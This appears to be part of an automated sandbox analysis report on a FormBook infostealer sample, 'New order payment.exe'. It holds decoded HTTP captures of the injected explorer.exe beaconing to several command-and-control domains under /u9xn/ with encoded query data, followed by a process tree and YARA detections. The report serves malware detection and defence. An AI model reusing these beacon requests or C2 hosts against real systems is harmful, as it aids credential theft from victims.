                                                              Oct 27, 2021 16:20:27.846381903 CEST9250INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Wed, 27 Oct 2021 14:20:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "61704c6b-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.54979174.208.236.13480C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:38.101341009 CEST9251OUTGET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.crisisinterventionadvocates.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:38.245042086 CEST9252INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 626
                                                              Connection: close
                                                              Date: Wed, 27 Oct 2021 14:20:38 GMT
                                                              Server: Apache
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.549792137.184.31.3580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:43.386756897 CEST9253OUTGET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.srchwithus.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:43.479991913 CEST9254INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 27 Oct 2021 14:20:43 GMT
                                                              Server: Apache/2.4.37 (centos) OpenSSL/1.1.1g
                                                              Location: https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n
                                                              Content-Length: 338
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 72 63 68 77 69 74 68 75 73 2e 6f 6e 6c 69 6e 65 2f 75 39 78 6e 2f 3f 45 76 47 44 4c 6e 4a 3d 4a 73 2b 73 67 6d 52 61 49 56 55 71 37 71 46 7a 73 4a 41 4a 2b 39 41 58 58 4c 5a 43 30 58 37 39 63 63 37 71 71 6f 5a 42 6b 4c 61 46 78 59 73 31 73 6d 6f 71 38 56 4f 4c 6d 51 55 74 74 69 70 4c 68 66 4c 7a 26 61 6d 70 3b 35 6a 3d 30 42 4b 50 67 68 37 58 34 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&amp;5j=0BKPgh7X4n">here</a>.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.5497943.67.234.15580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:48.543695927 CEST9263OUTGET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.itskosi.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:48.563533068 CEST9264INHTTP/1.1 301 Moved Permanently
                                                              cache-control: public, max-age=0, must-revalidate
                                                              content-length: 44
                                                              content-type: text/plain
                                                              date: Tue, 26 Oct 2021 10:09:50 GMT
                                                              x-nf-request-id: 01FK11ZZ198CWTS1MT7WAK41C6
                                                              location: https://www.itskosi.com/u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n
                                                              server: Netlify
                                                              age: 101459
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f
                                                              Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.54979835.241.55.10380C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:54.027491093 CEST9277OUTGET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.sejiw3.xyz
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:54.332242012 CEST9278INHTTP/1.1 200 OK
                                                              Server: nginx/1.14.0
                                                              Date: Wed, 27 Oct 2021 14:20:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 5379
                                                              Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                              Vary: Accept-Encoding
                                                              ETag: "608ba74c-1503"
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 35 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
                                                              Oct 27, 2021 16:20:54.332283020 CEST9279INData Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                              Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
                                                              Oct 27, 2021 16:20:54.332321882 CEST9281INData Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                              Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
                                                              Oct 27, 2021 16:20:54.332348108 CEST9281INData Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d
                                                              Data Ascii: rch||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t
                                                              Oct 27, 2021 16:20:54.346199036 CEST9283INData Raw: 72 75 65 22 3d 3d 3d 65 29 7b 76 61 72 20 24 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65
                                                              Data Ascii: rue"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js")
                                                              Oct 27, 2021 16:20:54.346251965 CEST9283INData Raw: 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2
                                                              Data Ascii: v class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.cb2b0f54365b00b5316b.js"></script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.549799160.153.136.380C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:59.425259113 CEST9284OUTGET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.hanansalman.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:59.480664968 CEST9284INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: New order payment.exe PID: 4912 Parent PID: 6088

                                                              General

                                                              Start time:16:18:59
                                                              Start date:27/10/2021
                                                              Path:C:\Users\user\Desktop\New order payment.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x400000
                                                              File size:254147 bytes
                                                              MD5 hash:0C301355B11C3BC570D18B02BB7C99D8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: New order payment.exe PID: 2372 Parent PID: 4912

                                                              General

                                                              Start time:16:19:00
                                                              Start date:27/10/2021
                                                              Path:C:\Users\user\Desktop\New order payment.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x400000
                                                              File size:254147 bytes
                                                              MD5 hash:0C301355B11C3BC570D18B02BB7C99D8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 2372

                                                              General

                                                              Start time:16:19:05
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff693d90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: svchost.exe PID: 2600 Parent PID: 3472

                                                              General

                                                              Start time:16:19:26
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\svchost.exe
                                                              Imagebase:0x9b0000
                                                              File size:44520 bytes
                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
